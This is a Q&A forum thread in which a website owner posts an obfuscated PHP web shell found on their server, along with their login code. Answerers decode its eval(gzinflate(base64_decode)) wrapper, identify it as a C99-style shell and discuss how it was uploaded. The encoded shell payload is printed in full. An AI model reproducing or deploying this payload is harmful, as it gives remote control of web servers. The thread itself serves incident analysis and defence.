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'\x29\x29\x29\x3B","\x2E");
?>

From the administrative root of the site the login control on all pages is basically:

<?php
session_start();
require_once ("/aut/EMP_user.php");

$usuarioDAO = new usuarioDAO();

if (isset($_SESSION['logado']) ? $_SESSION['logado'] : NULL == 1) {
    ?>
    <script type="text/javascript">
        document.location.href = "index.php";
    </script>
    <?php
}
?>

if (isset($_GET['erro'])) {
    switch ($_GET['erro']) {
        case "1":
            ?>
            <script type="text/javascript">
                alert("Você não tem permissão para acessar o painel.");
            </script>
            <?php
            break;
        case "2":
            ?>
            <script type="text/javascript">
                alert("Você saiu do painel.");
            </script>
            <?php
            break;
    }
}
?>

And to validate login (login.php):

<?php
if (isset($_POST['btnSubmit'])) {

    if ($usuarioDAO->login($_POST['email'],sha1($_POST['password']))) {

        $_SESSION['logado'] = '1';
        ?>

        <script type="text/javascript">
            document.location.href = "index.php";
        </script>
        <?php
    } else {
        ?>
        <script type="text/javascript">
            alert("Usuário ou senha inválido.");
        </script>
        <?php
    }
}

Emp_user.php:

<?php

require_once("../../Connections/EMP_config.php");

class usuarioDAO {

    function __construct() {
        $this->pdo = Conexao::EMP_getInstance();
    }
    function login($EMP_us_email, $EMP_se_senha) {
        try {


              $EMP_us_email = addslashes($EMP_us_email);
              $EMP_se_senha = addslashes($EMP_se_senha);

              $stmt = $this->pdo->prepare("SELECT * FROM admin WHERE email = :EMP_us_email AND password = :EMP_se_senha");

            $param = array(
                ":EMP_us_email" => $EMP_us_email,
                ":EMP_se_senha" => $EMP_se_senha
            );


            $stmt->execute($param);

            if ($stmt->rowCount() > 0) {
                return true;
            } else {
                return false;
            }
        } catch (PDOException $ex) {
            echo "ERRO 04: {$ex->getMessage()}";
        }
    }

}

?>
  • 1

    I took the liberty and deleted your site’s shell script to prevent anyone malicious from making any changes.

  • ok! thank you very much

1 answer

4


About your problem take a look if there is any area or script that accepts upload as it may be from there that the shell has been uploaded.


The \x is encondig ASCII in hexadecimal notation.

I decoded where you were using:

// "\x2F\x2E\x2A\x2F\x65" => /.*/e
// "\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28" => eval(gzinflate(base64_decode(
// "\x29\x29\x29\x3B" => )));
// "\x2E" => .

So he used Eval to execute a string as code, gzinflate to decompress the return of the decoded chunk using Base64.

Basically the script is this: http://pastebin.com/5Shmh0Vm

  • Curiosity, what does this code do harmful? It looks like a "fake page".

  • 1

    Reading from the top it lists information related to the server, allows you to upload/change, view the files, etc. It is a shell the most famous is C99.

  • It’s worth mentioning how it might have gotten to his code: SQL Injection, or someone with access to the server (legitimate or not).

  • Interesting that this shell even has functions to handle database and even check for case it is a Crawler in the user agent it returns 404.

  • Thank you for the explanation @Laerte fully understood.

  • This general mess script, the shell opens several features @diegofm just see the code it opens, where Larte posted http://pastebin.com/5Shmh0Vm

  • @Rafaelassmann I got to open, but unfortunately it is not my area of knowledge some things in javascript and php constant there :/

  • Just search friend, programming has no secret haha :D @Rafaelassmann if the answer has met you mark as answer.

  • @Rafaelassmann Also check if you are not using any vulnerable plugin.

  • @Laerte I use plugin yes, and I’ve used several free app to check vulnerabilities but nothing found, indicates me something? I basically use this by uploading http://blueimp.github.io/jQuery-File-Upload/ (Basic Plus UI)

  • Run a test, use a file using this file and make sure it will run directly by accessing, if positive Select the formats it will accept (php for example).

  • @Laerte this test I did already before delivering, I released only jpg, png and gif extensions. Also I have login control on all php pages that I posted in the question. In other words, since the individual has uploaded to the root where my image is located, you understand the doubt?

  • @Rafaelassmann Can you check the log to see when this page started to be accessed? Maybe you can track the source of the upload.

  • @Laerte Acessei o log, but at first it presents only this: Line 2635938: 125.166.228.94 - - [21/May/2016:20:43:00 -0300] "GET //admin//pages//server///php//files///ws0oxp.php HTTP/1.1" 200 4535 Line 2635951: 125.166.228.94 - - [21/May/2016:20:43:18 -0300] "POST //admin//pages//server//php//files//ws0oxp.php HTTP/1.1" 200 3729 Line 2635990: 125.166.228.94 - - [21/May/2016:20:45:17 -0300] "POST //admin//pages//server//php//files//ws0oxp.php HTTP/1.1" 200 4112 Line 2636034: 125.166.228.94 - - [21/May/2016:20:45:21 -0300] ...

Show 9 more comments

Browser other questions tagged

You are not signed in. Login or sign up in order to post.